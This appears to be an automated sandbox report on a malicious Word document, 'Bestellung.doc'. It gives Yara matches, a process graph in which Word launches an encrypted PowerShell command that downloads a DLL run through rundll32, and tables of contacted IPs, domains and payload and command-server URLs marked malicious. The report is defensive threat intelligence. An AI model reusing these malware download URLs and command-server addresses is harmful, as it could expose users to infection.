Source: Yara match File source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 344273 Sample: Bestellung.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 13 other signatures 2->57 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 24 2->14         started        process3 signatures4 61 Suspicious powershell command line found 11->61 63 Very long command line found 11->63 65 Encrypted powershell cmdline option found 11->65 16 powershell.exe 16 11 11->16         started        20 msg.exe 11->20         started        process5 dnsIp6 37 traumfrauen-ukraine.de 212.227.200.73, 443, 49170, 49171 ONEANDONE-ASBrauerstrasse48DE Germany 16->37 39 e-wdesign.eu 45.138.97.75, 49169, 80 M247GB Germany 16->39 41 3 other IPs or domains 16->41 35 C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll, data 16->35 dropped 22 rundll32.exe 16->22         started        file7 process8 process9 24 rundll32.exe 22->24         started        process10 26 rundll32.exe 2 24->26         started        signatures11 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->59 29 rundll32.exe 26->29         started        process12 process13 31 rundll32.exe 9 29->31         started        dnsIp14 43 110.172.180.180, 49179, 8080 WORLDPHONE-INASNumberforInterdomainRoutingIN India 31->43 45 132.248.38.158, 49177, 49178, 80 UniversidadNacionalAutonomadeMexicoMX Mexico 31->45 47 5 other IPs or domains 31->47 49 System process connects to network (likely due to code injection or exploit) 31->49 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.88.166
 unknown United States
13335 CLOUDFLARENETUS true
70.32.89.105
 unknown United States
398110 GO-DADDY-COM-LLCUS true
203.157.152.9
 unknown Thailand
9649 MOPH-TH-APInformationTechnologyOfficeSG true
45.138.97.75
 unknown Germany
9009 M247GB true
132.248.38.158
 unknown Mexico
278 UniversidadNacionalAutonomadeMexicoMX true
172.217.6.174
 unknown United States
15169 GOOGLEUS true
110.172.180.180
 unknown India
18002 WORLDPHONE-INASNumberforInterdomainRoutingIN true
157.245.145.87
 unknown United States
14061 DIGITALOCEAN-ASNUS true
192.0.78.20
 unknown United States
2635 AUTOMATTICUS true
212.227.200.73
 unknown Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
190.55.186.229
 unknown Argentina
27747 TelecentroSAAR true
161.49.84.2
 unknown Philippines
17639 CONVERGE-ASConvergeICTSolutionsIncPH true

Contacted Domains

Name IP Active
shop.nowfal.dev 104.21.88.166 true
traumfrauen-ukraine.de 212.227.200.73 true
e-wdesign.eu 45.138.97.75 true
nightlifemumbai.club 172.217.6.174 true
jflmktg.wpcomstaging.com 192.0.78.20 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://nightlifemumbai.club/x/0wBD3/ true
  • Avira URL Cloud: malware
 unknown
http://traumfrauen-ukraine.de/bin/JyeS/ true
  • Avira URL Cloud: safe
 unknown
http://203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ true
  • Avira URL Cloud: safe
 unknown
http://e-wdesign.eu/wp-content/bn1IgDejh/ true
  • Avira URL Cloud: safe
 unknown
https://157.245.145.87:443/gjk3j942rq/3t3141347sxz/js59r1n8zph/ true
  • Avira URL Cloud: safe
 unknown